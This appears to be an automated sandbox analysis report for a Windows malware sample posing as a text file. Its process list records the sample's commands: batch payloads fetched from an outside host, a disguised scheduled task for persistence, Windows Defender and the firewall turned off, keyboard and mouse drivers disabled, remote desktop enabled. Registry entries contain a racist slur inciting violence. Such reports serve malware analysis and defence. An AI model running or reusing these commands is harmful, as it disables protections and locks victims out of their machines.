000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e9070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key created | \Registry\User\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133863617754787282" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers | C:\Windows\system32\reg.exe | N/A |
| Key created | \Registry\User\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{17A1C827-CEA6-48F4-B44C-278232D11007} | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c200602000400500010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 | N/A | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe
"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\system32\curl.exe
curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\curl.exe
curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\netsh.exe
